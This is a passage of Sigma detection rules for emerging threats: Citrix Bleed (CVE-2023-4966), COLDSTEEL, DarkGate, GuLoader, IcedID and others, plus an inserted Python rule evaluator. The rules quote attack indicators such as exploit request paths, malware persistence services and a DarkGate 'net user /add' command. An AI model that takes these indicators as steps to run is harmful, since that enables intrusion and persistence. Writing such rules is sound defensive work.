    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml",
    "content": "title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy\nid: aee7681f-b53d-4594-a9de-ac51e6ad3362\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'\n        cs-host|re: '.{150}'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml",
    "content": "title: CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy\nid: ff349b81-617f-4af4-924f-dbe8ea9bab41\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml",
    "content": "title: CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver\nid: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0\nrelated:\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/oauth/idp/.well-known/openid-configuration'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml",
    "content": "title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver\nid: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\nstatus: test\ndescription: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/oauth/idp/.well-known/openid-configuration'\n        cs-host|re: '.{150}'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
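The F5 rules above key on two encodings of the same request-body strings, and the Citrix rules split one endpoint into a medium-severity "attempt" tier (a successful GET) and a high-severity "exploit" tier (an oversized Host header). The Python below, added here as an illustration and not SigmaHQ or pySigma code, evaluates the CVE-2023-46747 webserver rule and the two CVE-2023-4966 webserver rules over constructed log records. The evaluator implements only the modifier semantics those rules use (plain equality, `contains`, `re`, `|all`, and record-wide keyword lists). The records, their `cs-body` field standing in for collected request-body data, and the iControl command string in the first record are constructed for the example and come from no real log.

```python
import re


def _match_value(actual, pattern, modifiers):
    """Compare one field value against one pattern under Sigma modifier semantics."""
    if actual is None:
        return False
    value, pat = str(actual), str(pattern)
    if "re" in modifiers:                      # regex: case-sensitive, unanchored search
        return re.search(pat, value) is not None
    value, pat = value.lower(), pat.lower()    # plain string matching is case-insensitive
    if "contains" in modifiers:
        return pat in value
    if "startswith" in modifiers:
        return value.startswith(pat)
    if "endswith" in modifiers:
        return value.endswith(pat)
    return value == pat


def match_selection(event, selection):
    """Every 'field|mods: value-or-list' entry of a selection map must match (AND)."""
    for key, pattern in selection.items():
        field, *mods = key.split("|")
        patterns = pattern if isinstance(pattern, list) else [pattern]
        hits = [_match_value(event.get(field), p, mods) for p in patterns]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def match_keywords(event, keywords, require_all=True):
    """Keyword lists are searched over the whole record, not one named field."""
    blob = " ".join(str(v) for v in event.values()).lower()
    hits = [k.lower() in blob for k in keywords]
    return all(hits) if require_all else any(hits)


# CVE-2023-46747 (webserver variant): selection and (keywords_hex or keywords_plain)
F5_SELECTION = {"cs-method": "POST", "cs-uri-stem|contains": "/mgmt/tm/util/bash"}
F5_KEYWORDS_PLAIN = ["/tmui/Control/form", "form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp"]
F5_KEYWORDS_HEX = [k.encode().hex() for k in F5_KEYWORDS_PLAIN]  # the rule's hex strings, derived


def f5_cve_2023_46747(event):
    return match_selection(event, F5_SELECTION) and (
        match_keywords(event, F5_KEYWORDS_HEX) or match_keywords(event, F5_KEYWORDS_PLAIN))


# CVE-2023-4966 (webserver variants): one endpoint, two tiers
CITRIX_PATH = {"cs-method": "GET",
               "cs-uri-stem|contains": "/oauth/idp/.well-known/openid-configuration"}


def citrix_cve_2023_4966_attempt(event):   # level: medium, any successful request
    return match_selection(event, {**CITRIX_PATH, "sc-status": 200})


def citrix_cve_2023_4966_exploit(event):   # level: high, Host header of 150+ characters
    return match_selection(event, {**CITRIX_PATH, "cs-host|re": ".{150}"})


RULES = {
    "CVE-2023-46747 Exploitation Activity - Webserver": f5_cve_2023_46747,
    "CVE-2023-4966 Potential Exploitation Attempt - Webserver": citrix_cve_2023_4966_attempt,
    "CVE-2023-4966 Exploitation Attempt - Webserver": citrix_cve_2023_4966_exploit,
}


def run_rules(events):
    """Return {event index: [matching rule titles]} for every event that fires a rule."""
    out = {}
    for i, ev in enumerate(events):
        hits = [title for title, rule in RULES.items() if rule(ev)]
        if hits:
            out[i] = hits
    return out


# Constructed records in the field names the rules use; 'cs-body' is the collected
# request body the rules' logsource definition asks for.
_F5_BODY = "/tmui/Control/form?form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp"
SAMPLE_EVENTS = [
    {"cs-method": "POST", "cs-uri-stem": "/mgmt/tm/util/bash", "sc-status": 200,
     "cs-host": "bigip.example.test",
     "cs-body": "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'tmsh show sys version'\"}"},  # routine admin use
    {"cs-method": "POST", "cs-uri-stem": "/mgmt/tm/util/bash", "sc-status": 200,
     "cs-host": "bigip.example.test", "cs-body": _F5_BODY},                   # body logged as text
    {"cs-method": "POST", "cs-uri-stem": "/mgmt/tm/util/bash", "sc-status": 200,
     "cs-host": "bigip.example.test", "cs-body": _F5_BODY.encode().hex()},    # body logged hex-encoded
    {"cs-method": "GET", "cs-uri-stem": "/oauth/idp/.well-known/openid-configuration",
     "sc-status": 200, "cs-host": "gateway.example.test"},                    # ordinary discovery hit
    {"cs-method": "GET", "cs-uri-stem": "/oauth/idp/.well-known/openid-configuration",
     "sc-status": 200, "cs-host": "a" * 200},                                  # oversized Host header
]

if __name__ == "__main__":
    for index, titles in run_rules(SAMPLE_EVENTS).items():
        print(index, titles)
```

Two properties of the rules show up directly: the `keywords_hex` list is exactly `str.encode().hex()` of the plain strings, so a collector that hex-encodes bodies still trips the rule; and `.{150}` is an unanchored search, so the exploit tier fires on any Host value of 150 characters or more while the attempt tier fires on every successful request to the endpoint, which is why the oversized-host record matches both.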
  {
    "path": "rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml",
    "content": "title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE\nid: 6d5b8176-d87d-4402-8af4-53aee9db7b5d\nstatus: test\ndescription: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/3946\n    - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\svchost.exe'\n        ParentCommandLine|contains: '-k DHCPServer'\n        CommandLine|contains: '-k DHCPServer'\n        User|contains: # Covers many language settings for Network Service. Please expand.\n            - 'NETWORK SERVICE'\n            - 'NETZWERKDIENST'\n            - 'SERVIZIO DI RETE'\n            - 'SERVICIO DE RED'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/README.md",
    "content": "# COLDSTEEL - Windows Remote Access Tool\n\n## Summary\n\nCOLDSTEEL is a Remote Access Tool designed to support interactive desktop functionality and command-line access.\n\nYou can find more information on the threat in the following articles:\n\n- [COLDSTEEL Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf)\n\n## Rules\n\n- [COLDSTEEL Persistence Service Creation](./win_system_malware_coldsteel_persistence_service.yml)\n- [COLDSTEEL RAT Anonymous User Process Execution](./proc_creation_win_malware_coldsteel_anonymous_process.yml)\n- [COLDSTEEL RAT Cleanup Command Execution](./proc_creation_win_malware_coldsteel_cleanup.yml)\n- [COLDSTEEL RAT Service Persistence Execution](./proc_creation_win_malware_coldsteel_service_persistence.yml)\n- [Potential COLDSTEEL Persistence Service DLL Creation](./file_event_win_malware_coldsteel_service_dll_creation.yml)\n- [Potential COLDSTEEL Persistence Service DLL Load](./image_load_malware_coldsteel_persistence_service_dll.yml)\n- [Potential COLDSTEEL RAT File Indicators](./file_event_win_malware_coldsteel_renamed_cmd.yml)\n- [Potential COLDSTEEL RAT Windows User Creation](./registry_set_malware_coldsteel_created_users.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml",
    "content": "title: Potential COLDSTEEL RAT File Indicators\nid: c708a93f-46b4-4674-a5b8-54aa6219c5fa\nstatus: test\ndescription: Detects the creation of a file named \"dllhost.exe\" in the \"C:\\users\\public\\Documents\\\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename: 'C:\\users\\public\\Documents\\dllhost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml",
    "content": "title: Potential COLDSTEEL Persistence Service DLL Creation\nid: 1fea93a2-1524-4a3c-9828-3aa0c2414e27\nstatus: test\ndescription: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Roaming\\newdev.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml",
    "content": "title: Potential COLDSTEEL Persistence Service DLL Load\nid: 1d7a57da-02e0-4f7f-92b1-c7b486ccfed5\nstatus: test\ndescription: |\n    Detects a suspicious DLL load by an \"svchost\" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith: '\\AppData\\Roaming\\newdev.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml",
    "content": "title: COLDSTEEL RAT Anonymous User Process Execution\nid: e01b6eb5-1eb4-4465-a165-85d40d874add\nstatus: test\ndescription: Detects the creation of a process executing as user called \"ANONYMOUS\" seen used by the \"MileStone2016\" variant of COLDSTEEL\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains:\n            - '\\Windows\\System32\\'\n            - '\\AppData\\'\n        User|contains: 'ANONYMOUS'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml",
    "content": "title: COLDSTEEL RAT Cleanup Command Execution\nid: 88516f06-ebe0-47ad-858e-ae9fd060ddea\nstatus: test\ndescription: Detects the creation of a \"rundll32\" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in \"MileStone2017\" and some \"MileStone2016\" samples\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        ParentCommandLine|contains:\n            - ' -k msupdate'\n            - ' -k msupdate2'\n            - ' -k alg'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'UpdateDriverForPlugAndPlayDevicesW'\n            - 'ServiceMain'\n            - 'DiUninstallDevice'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml",
    "content": "title: COLDSTEEL RAT Service Persistence Execution\nid: 9f9cd389-cea0-4142-bf1a-a3fd424abedd\nstatus: test\ndescription: Detects the creation of an \"svchost\" process with specific command line flags, that were seen present and used by ColdSteel RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        CommandLine|endswith:\n            - ' -k msupdate'\n            - ' -k msupdate2'\n            - ' -k alg'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml",
    "content": "title: Potential COLDSTEEL RAT Windows User Creation\nid: 95214813-4c7a-4a50-921b-ee5c538e1d16\nstatus: test\ndescription: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-'\n            - '\\ProfileImagePath'\n        Details|contains:\n            - 'ANONYMOUS'\n            - '_DomainUser_'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml",
    "content": "title: COLDSTEEL Persistence Service Creation\nid: 3ced239c-7285-4b54-99c4-8525b69293f7\nstatus: test\ndescription: Detects the creation of new services potentially related to COLDSTEEL RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'Name'\n            - 'msupdate'\n            - 'msupdate2'\n        ImagePath|contains: '\\Windows\\System32\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/README.md",
    "content": "# DarkGate Loader\n\n## Summary\n\nDARKGATE is a Windows-based malware that has capabilities ranging from cryptocurrency mining, file encryption, credential stealing and remote access to victim endpoints. It was first publicly reported in 2018. [1](https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware)\n\nYou can find more information on the threat in the following articles:\n\n- [Microsoft Teams Used as Initial Access for DARKGATE Malware](https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware)\n- [Shining some light on the DarkGate loader](https://github.security.telekom.com/2023/08/darkgate-loader.html)\n\n## Rules\n\n- [DarkGate - Autoit3.EXE File Creation By Uncommon Process](./file_event_win_malware_darkgate_autoit3_binary_creation.yml)\n- [DarkGate - Autoit3.EXE Execution Parameters](./proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml)\n- [DarkGate User Created Via Net.EXE](./proc_creation_win_malware_darkgate_net_user_creation.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml",
    "content": "title: DarkGate - Autoit3.EXE File Creation By Uncommon Process\nid: 1a433e1d-03d2-47a6-8063-ece992cf4e73\nstatus: test\ndescription: |\n    Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.\n    This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs\n    process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other\n    processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.\nreferences:\n    - https://github.security.telekom.com/2023/08/darkgate-loader.html\n    - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\n    - https://github.com/pr0xylife/DarkGate/tree/main\nauthor: Micah Babinski\ndate: 2023-10-15\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1105\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\Autoit3.exe'\n            - '\\curl.exe'\n            - '\\ExtExport.exe'\n            - '\\KeyScramblerLogon.exe'\n            - '\\wmprph.exe'\n        TargetFilename|endswith: '\\Autoit3.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml",
    "content": "title: DarkGate - Autoit3.EXE Execution Parameters\nid: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d\nstatus: test\ndescription: |\n    Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within\n    the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate\n    command-and-control server.\nreferences:\n    - https://github.security.telekom.com/2023/08/darkgate-loader.html\n    - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\n    - https://github.com/pr0xylife/DarkGate/tree/main\nauthor: Micah Babinski\ndate: 2023-10-15\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_proc:\n        - Image|endswith: '\\Autoit3.exe'\n        - OriginalFileName: 'AutoIt3.exe'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\KeyScramblerLogon.exe'\n            - '\\msiexec.exe'\n    filter_main_legit_autoit_location:\n        Image|endswith:\n            - ':\\Program Files (x86)\\AutoIt3\\AutoIt3.exe'\n            - ':\\Program Files\\AutoIt3\\AutoIt3.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml",
    "content": "title: DarkGate - User Created Via Net.EXE\nid: bf906d7b-7070-4642-8383-e404cf26eba5\nstatus: test\ndescription: Detects creation of local users via the net.exe command with the name of \"DarkGate\"\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-27\nmodified: 2023-10-15\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # /c net user /add SafeMode DarkGate0!\n    selection:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n            - 'DarkGate'\n            - 'SafeMode'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml",
    "content": "title: Griffon Malware Attack Pattern\nid: bcc6f179-11cd-4111-a9a6-0fab68515cf7\nstatus: test\ndescription: Detects process execution patterns related to Griffon malware as reported by Kaspersky\nreferences:\n    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\local\\temp\\'\n            - '//b /e:jscript'\n            - '.txt'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/GuLoader/proc_creation_win_malware_guloader_execution.yml",
    "content": "title: Injected Browser Process Spawning Rundll32 - GuLoader Activity\nid: 89e1490f-1a3e-452a-bbb8-b68a5f58072f\nstatus: test\ndescription: |\n    Detects the execution of installed GuLoader malware on the host.\n    GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.\nreferences:\n    - Internal Research\nauthor: '@kostastsale'\ndate: 2023-08-07\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml",
    "content": "title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32\nid: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5\nstatus: test\ndescription: Detects RunDLL32.exe executing a single digit DLL named \"1.dll\" with the export function \"DllRegisterServer\". This behaviour was often seen used by malware and especially IcedID\nreferences:\n    - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith:\n            - '\\1.dll, DllRegisterServer' # In case of full path exec\n            - ' 1.dll, DllRegisterServer' # In case of direct exec\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml",
